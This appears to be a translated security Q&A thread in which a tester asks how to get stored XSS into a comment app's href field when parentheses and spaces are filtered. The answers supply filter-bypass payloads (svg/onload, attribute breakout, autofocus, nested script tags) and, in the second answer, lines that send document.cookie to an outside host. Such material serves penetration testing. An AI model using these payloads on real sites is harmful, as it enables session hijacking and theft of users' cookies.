存储跨站点脚本，不带Parentheses或空格

Question

我正在测试一个使用表单http://google.com链接并将其放在href标记中的注释应用程序，如下所示：

<a rel="nofollow" href="http://google.com">

得到的注释去掉了http://或https://。

在测试中，我一直试图以这样的方式使用某种形式的http://"onmouseover="alert(1); --我会在页面上使用<a href="http://"onmouseover="alert(1);">，但它一直没有工作。

更多信息：

1. 括号被过滤掉。我试过不同的编码。
2. <script>标签被过滤了，但是你可以通过<scr<script>ipt>来解决这个问题。
3. 空格不能使用(如果我使用空格，它们会破坏标记)。我试过了ASCII和%20。
4. 我可以用分号，但如果它是最后一个字符的话，我得加倍，然后它就能正常工作了。
5. 尖括号，双引号，单引号，正斜杠，后斜杠和冒号都通过，没有过滤器。

我真的不知道如何利用我以前见过的<script>alert;throw 1;<script>，因为它似乎没有执行任何东西，即使它执行了，空间也不能使用。

有什么想法吗？

Answer 1

首先，您实际上可以使用/ char在html中拆分标记。常见的例子是：<svg/onload=alert(1)。

在您的例子中，尝试像http://"/onmouseover="alert(1)这样的有效负载。应该管用的。

其次，尝试避免在有效载荷中出现不必要的符号，比如有效载荷中的分号。而且，在大多数情况下，引用"是不必要的符号(到目前为止还没有)。因此，尝试编写onload=<your_paylaod>而不是onload="<your_payload>"。

第三，不要使用像onclick或onmouseover这样的用户交互操作.使用onload，onerror，或者像onfocus=<your_payload> autofocus一样组合它们。

接下来，如果不允许使用提示而不是括号，则可以尝试使用它们。(wiki格式不允许我打印笔画中的任何值，所以我希望你能理解它。

最后，为了摆脱常见的xss过滤器，使用prompt(1)代替alert(1)，使用<svg代替<img，使用document['cookie']代替document.cookie。

祝好运。

Answer 2

不如：

javascript:document.location.href='http://www.example.com/'+document.cookie

或

"/><scri<script>pt>document.location.href='http://www.example.com/'+document.cookie</script>

他们是否遵守你发现的过滤规则？我唯一不明白的是你说：

得到的注释去掉了http://或https://。

您是指<a>和</a>标记之间的部分吗?所以http://www.google.com通常被呈现为<a rel="nofollow" href="http://google.com">google.com</a>？